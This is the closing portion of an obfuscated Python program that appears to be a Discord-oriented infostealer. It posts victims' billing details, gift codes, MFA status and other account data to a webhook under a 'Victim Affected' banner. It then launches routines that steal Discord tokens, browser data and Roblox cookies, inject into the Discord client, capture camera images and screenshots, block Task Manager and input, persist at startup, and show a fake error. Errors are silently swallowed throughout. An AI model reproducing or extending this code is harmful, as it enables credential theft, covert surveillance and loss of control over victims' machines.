            embed.add_field(name=":earth_africa: Language:", value=f"```{HTKBXLGCAAXYAXNNKJZTUJNKVEEIVGOCBNOKPEMLHIQQHDJEKFZQMXZNCDHEPOXRLPGCIXFJNQYIMSBFWMLLVPPEIKLSEBWUUDD}```", inline=True)
            embed.add_field(name=":moneybag: Billing:", value=f"```{WNPMBYWHAFAXTBKSOFZWLDARMCIYDDQCHKZPZFYXGZUBLREKMFBIZOPPFDGVFSEBNNVCKFTLTQMFRBM}```", inline=True)
            embed.add_field(name=":gift: Gift Code:", value=f"```{DHYMFVWBSAWNJFXYOYQHVDAQFCQTBEBYHQXQTXDJWFBBFLZAFRLWEWOQKDJAUZFUNO}```", inline=True)
            embed.add_field(name=":lock: Multi-Factor Authentication:", value=f"```{IUNSLJPKAMHFOKIIUGAAEXKSXZFLTKUHBYHPGHXDBFZCCHEPFSNHKYYHWSGXMLQCGBWGOXQUDASZBCLMUTUKEASOSCSLMGREMV}```", inline=True)
            embed.add_field(name=":frame_photo: Profile Picture:", value=f"", inline=False)
            embed.set_image(url=THJKECFFAGBMDXYFOIQABGLHJRJEJRMCRPZEGNPGMNJXRNOLQEGVHKFLEJLAQURWGGQFZXHKFYXEISPYIGZKJES)
            embed.set_footer(text=ZWBDJHUEEYOZSFFWTNRUZSOKQJIWEQJPTVKFJVGBULBYJEQXUSBWVCGHRQSBFGGKZKMIFLOYAVMCBFWTPFFDVS, icon_url=FGLSTRYGWZLQKQRAFBRRSTLCRKPWABXAZKKTLAZFKLLVPCMXLVRKGWSQAYOIKIZDDCYORUXULLBOYUEJZQGRPVRRWXZWPQI)
            VTFRPQVEZBDNXMZIGAHKOIZJFXMMTNEQGBIDUGGRMGLPWFFEBWJPEVAQSSEPBG.send(embed=embed, username=XKXJBWQQEPDFFGSTROLMMXLPGVEBOWYXZLEVUXERWPMQLGJJIFJZZMJXOTJISBGIPYRQEARNXWQGPHKFPUZALAMXPMN, avatar_url=FGLSTRYGWZLQKQRAFBRRSTLCRKPWABXAZKKTLAZFKLLVPCMXLVRKGWSQAYOIKIZDDCYORUXULLBOYUEJZQGRPVRRWXZWPQI)

    upload_t0k3n5()

try: requests.post(UIGKKQMJAYHAAQSCTOJCDKCKFCPFINTHBJLZEVZXQTIRNZGGWNSPHTNFTUVYNUI, json={'content': f'****╔═════════════════Victim Affected═════════════════╗****', 'username': XKXJBWQQEPDFFGSTROLMMXLPGVEBOWYXZLEVUXERWPMQLGJJIFJZZMJXOTJISBGIPYRQEARNXWQGPHKFPUZALAMXPMN, 'avatar_url': FGLSTRYGWZLQKQRAFBRRSTLCRKPWABXAZKKTLAZFKLLVPCMXLVRKGWSQAYOIKIZDDCYORUXULLBOYUEJZQGRPVRRWXZWPQI,})
except: pass
try: threading.Thread(target=B10ck_K3y).start()
except: pass
try: threading.Thread(target=B10ck_T45k_M4n4g3r).start()
except: pass
try: threading.Thread(target=B10ck_W3b5it3).start()
except: pass
try: threading.Thread(target=St4rtup).start()
except: pass
try: Sy5t3m_Inf0()
except: pass
try: Di5c0rd_T0k3n()
except: pass
try: Di5c0rd_inj3c710n()
except: pass
try: Br0w53r_5t341()
except: pass
try: R0b10x_C00ki3()
except: pass
try: C4m3r4_C4ptur3()
except: pass
try: Op3n_U53r_Pr0fi13_53tting5()
except: pass
try: Scr33n5h0t()
except: pass
try: requests.post(UIGKKQMJAYHAAQSCTOJCDKCKFCPFINTHBJLZEVZXQTIRNZGGWNSPHTNFTUVYNUI, json={'content': f'****╚══════════════════{FFPQBJKKPSLHVOCLMLQUBRSWWHWHKWYQYRJDUFLYIESVNZBYANOVTCDBXQS}══════════════════╝****', 'username': XKXJBWQQEPDFFGSTROLMMXLPGVEBOWYXZLEVUXERWPMQLGJJIFJZZMJXOTJISBGIPYRQEARNXWQGPHKFPUZALAMXPMN, 'avatar_url': FGLSTRYGWZLQKQRAFBRRSTLCRKPWABXAZKKTLAZFKLLVPCMXLVRKGWSQAYOIKIZDDCYORUXULLBOYUEJZQGRPVRRWXZWPQI})
except: pass
try: threading.Thread(target=Sp4m_Opti0ns).start()
except: pass
try: threading.Thread(target=R3st4rt).start()
except: pass
try: threading.Thread(target=F4k3_3rr0r).start()
except: pass
try: threading.Thread(target=Shutd0wn).start()
except: pass
Clear()
